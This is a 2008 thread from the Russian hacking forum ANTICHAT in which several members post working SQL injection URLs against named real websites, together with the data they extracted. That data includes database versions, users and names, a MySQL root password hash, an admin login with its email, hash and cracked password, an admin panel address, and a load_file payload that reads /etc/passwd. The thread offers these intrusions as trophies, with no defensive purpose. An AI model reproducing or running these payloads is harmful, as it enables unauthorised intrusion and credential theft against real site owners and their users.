HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.04.2008, 02:33
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами: 9587456

Репутация: 120
По умолчанию

http://danko.dn.ua/news.php?id=-17+union+select+1,concat_ws(char(58),version(),use r(),database()),3/*&lang=ru
5.1.22-rc
root@localhost
danko

----------------------------------------------------------------------
http://danko.dn.ua/news.php?id=-17+union+select+1,concat_ws(char(58),user,Password ),3+from+mysql.user/*&lang=ru
root:*7827D3186CC7C1FF860E859079F1DBE1BB72A289

//*******************************************

http://www.newizv.ru/news/?id_news=-11675+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18/*

u10605@10.10.12.75
u10605
5.0.45

Последний раз редактировалось neon_fx; 07.04.2008 в 03:34..
 
Ответить с цитированием

  #2  
Старый 07.04.2008, 13:43
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
По умолчанию

http://agun.kz/
Код:
http://agun.kz/?id=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,10/*
4.1.22:alarko@localhost:wwwalarkokz


http://gafgaf.ru/
Код:
http://gafgaf.ru/index.php?rid=0x2d3127%20union+select+1,2,3,4,5/*
5.0.37-LOG:ALEXUSER_GAFGAF@LOCALHOST:ALEXUSER_GAFGAF


http://www.wollemipine.sk/
Код:
http://www.wollemipine.sk/page.php?lang=ru&id=0x2d3127%20union+select+1,2,3,4,5,6/*
4.1.21:db11330xwp@82.119.226.130:db11330xwp

by CaNNabi$
 
Ответить с цитированием

  #3  
Старый 07.04.2008, 13:54
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

http://www.aei.brookings.org/publications/abstract.php?pid=296+UNION+SELECT+1,2,concat_ws(0x 3A3a,user(),version(),database()),4,5,6,7/*

PR-5

aei_brookings@10.225.135.70:
:4.0.25-standard-log:
:aei_brookings
__________________________________________________ ______________________

http://www.terntv.com/programmedetails.php?pid=-11+union+select+1,concat_ws(0x3A3a,version(),user( ),database()),3,4,5,6/*

4.1.22-standard:
:terntv@server213-171-218-210.livedns.org.uk:
:tern
__________________________________________________ ______________________
http://www.stjerome.co.uk/page.php?id=-508+union+select+concat_ws(0x3A3a,version(),databa se(),user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37/*


PR-6

4.1.20:
:stjerome_new:
:dbaccess@mailserver.phidev.co.uk

Есть таблица user.В ней нашёл поле password. Имя подобрать не удалось. Админка: http://www.stjerome.co.uk/admin
__________________________________________________ ______________________
 
Ответить с цитированием

  #4  
Старый 07.04.2008, 13:55
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

MANHATTAN Technology With Vision
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,version(),6,concat(database (),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19, 20/*
version - 4.0.17-log
user - u10001203@lon1-webmysql-1.msh.demon.net
database - u10001203

Последний раз редактировалось -=megahertz=-; 07.04.2008 в 14:00..
 
Ответить с цитированием

  #5  
Старый 07.04.2008, 13:59
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

//A World Of Islands
http://www.aworldofislands.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,concat(version(),0x3a,datab ase(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20/*
version - 4.0.27-max-log
user - islands@linhost141.prod.mesa1.secureserver.net
database - islands
 
Ответить с цитированием

  #6  
Старый 07.04.2008, 14:29
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

http://www.ipodhacks.com/article.php?sid=-2482+union+select+1,2,3,4,concat_ws(0x3A3a,version (),user(),database()),6,7,8,9,10,11/*

PR-6

4.0.27-standard:
:ipodhack_user@localhost:
:ipodhack_mainsite
 
Ответить с цитированием

  #7  
Старый 07.04.2008, 17:00
Fuckel
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами: 9640431

Репутация: 105
По умолчанию

http://www.auto-instructors.ru/user/comment_text.php?inid=-1+union+select+1,2,3,4,concat_ws(CHAR(58),VERSION( ),DATABASE(),USER()),6,7,8,9/*
не раскрыл: http://www.auto-instructors.ru/paper/interesting/index.php?sort=-stat
4.1.22-log:wwwautoinstructo:autoinst@localhost


http://www.rustoy.ru/dog.php?screen=1&id=-1+union+select+concat_ws(CHAR(58),DATABASE(),USER( ),VERSION())/*
kayrueru_rustoy:kayrueru@81.177.16.93:4.1.22
http://www.rustoy.ru/dog.php?screen=1&id=-1+union+select+concat_ws(CHAR(58),name,password,em ail)+from+users/*
admin:4acc53e9d2ce2f1df7c4c8f9588ffc29:brt@rusdog.ru
4acc53e9d2ce2f1df7c4c8f9588ffc29 = rusdog


http://www.specialradio.ru/mkz/?id=-1+union+select+1,concat_ws(CHAR(58),DATABASE(),USE R(),VERSION()),3,4,5,6,7,8,9/*
host2283:host2283@localhost:4.0.27-log
выключен отчет об ошибках, проверил 2-1


http://www.trolza.ru/project.pl?id=-1+union+select+1,concat_ws(CHAR(58),VERSION(),DATA BASE(),USER()),3,4,5,6/*
5.0.27:trolza:trolza@localhost
колонки какие-то драные, так же отчет об ошибках отключен

Последний раз редактировалось Fuckel; 07.04.2008 в 19:27..
 
Ответить с цитированием

  #8  
Старый 07.04.2008, 20:16
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами: 9568860

Репутация: 146
По умолчанию

Код:
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10+from+mysql.user/*
кто пройдет дальше отпишите чтоли)
 
Ответить с цитированием

  #9  
Старый 07.04.2008, 22:13
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
С нами: 10315029

Репутация: 165
По умолчанию

Цитата:
Сообщение от bag  
Код:
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10+from+mysql.user/*
кто пройдет дальше отпишите чтоли)
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,lo ad_file('/etc/passwd'),5,6,7,8,9,10+from+mysql.user/*

load_file
 
Ответить с цитированием

  #10  
Старый 07.04.2008, 22:04
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами: 9568860

Репутация: 146
По умолчанию

а че с antiбояном то, смотрю предыдущие сайты туда не добавленны!!!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.